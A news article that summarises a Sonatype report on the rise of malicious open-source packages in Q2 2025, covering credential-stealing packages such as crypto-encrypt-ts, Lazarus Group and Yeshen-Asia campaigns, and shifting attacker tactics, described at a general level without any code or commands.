Sonatype discovered 16,279 malicious open-source packages in Q2 2025, marking a 188 percent increase from the previous year. Data exfiltration continues to dominate attacker tactics, with sophisticated campaigns targeting developers and their credentials.
Developers possess what attackers truly value: access to secrets and keys stored in predictable locations. Environment variables, config files, and CI/CD tools contain sensitive information that can provide unauthorized access to cloud accounts, APIs, databases, and internal systems.
The crypto-encrypt-ts package exemplifies this targeting strategy, a recent Sonatype report reveals. Masquerading as a legitimate CryptoJS library revival, it gained nearly 2,000 downloads before being identified as malware. Once installed, it selectively targeted crypto wallets with balances exceeding 1,000 units while harvesting MongoDB connection strings and environment variables.
This targeted approach reflects a sophisticated understanding of developer workflows and the value of the data they handle. Unlike traditional phishing campaigns targeting administrative employees, these attacks focus on the technical personnel who maintain direct access to production systems.
Developer environments under siege
The second quarter of 2025 revealed a troubling acceleration in supply chain attacks against the software development ecosystem. Malicious actors are systematically targeting developer environments, with 55 percent of all detected packages designed specifically for data exfiltration.
Over 4,400 packages were engineered to steal secrets, personally identifiable information, credentials, and API tokens from unsuspecting developers. The attackers are leveraging time-delayed payloads and encrypted transmissions to avoid detection, making these threats particularly dangerous for CI/CD pipelines.
The pattern dates back years. Earlier incidents from a few years ago include the spread of malicious packages on PyPI, which successfully infiltrated developer systems. Similarly, .NET developers were targeted back in 2023. What makes current attacks more concerning is their scale and persistence, however. For example, IDE extensions have been threatening the software supply chain recently and highlight the expanding attack surface that developers face.
Shifting threat landscape
The data reveals significant changes in attacker preferences. Crypto miners declined to just 5 percent of malicious packages as attackers pivot toward more profitable and persistent attack vectors. Data corruption malware doubled in frequency, representing 3 percent of total packages.
This shift suggests attackers are moving beyond simple resource theft toward more damaging activities. The trend toward data exfiltration and corruption indicates a maturation of supply chain attacks, with threat actors developing more sophisticated techniques to monetize their access.
Nation-state actors join the fray
The Lazarus Group, linked to the North Korean government, accounted for 107 malicious packages with over 30,000 downloads. These packages used deceptive names like “http-parse” and “vite-meta-plugin” to mimic legitimate development tools.
Separately, the Yeshen-Asia campaign deployed over 60 malicious npm packages through dozens of unique accounts, all traced back to common infrastructure. The attackers maintained persistence through systematic account creation and package publication, demonstrating the organized nature of these threats.
Protection remains challenging
Traditional antivirus solutions often fail to detect these sophisticated threats, leaving organizations vulnerable despite standard security measures. The packages frequently use legitimate certificates and mimic established projects, making detection particularly difficult.
The 188 percent increase in malicious packages represents more than just statistical growth: it signals a fundamental shift in how attackers approach software supply chains. As open-source adoption continues expanding, the attack surface grows correspondingly larger.
Organizations must implement comprehensive monitoring systems that can identify suspicious package behavior beyond simple signature-based detection. The complexity of modern development environments demands security solutions that understand the nuanced ways malicious code can infiltrate and persist within software projects. The escalation in open-source malware attacks underscores the critical importance of treating software supply chain security as a fundamental business risk rather than a technical afterthought. We fear this level of understanding, as promoted by Sonatype, will still take a long time to bed in.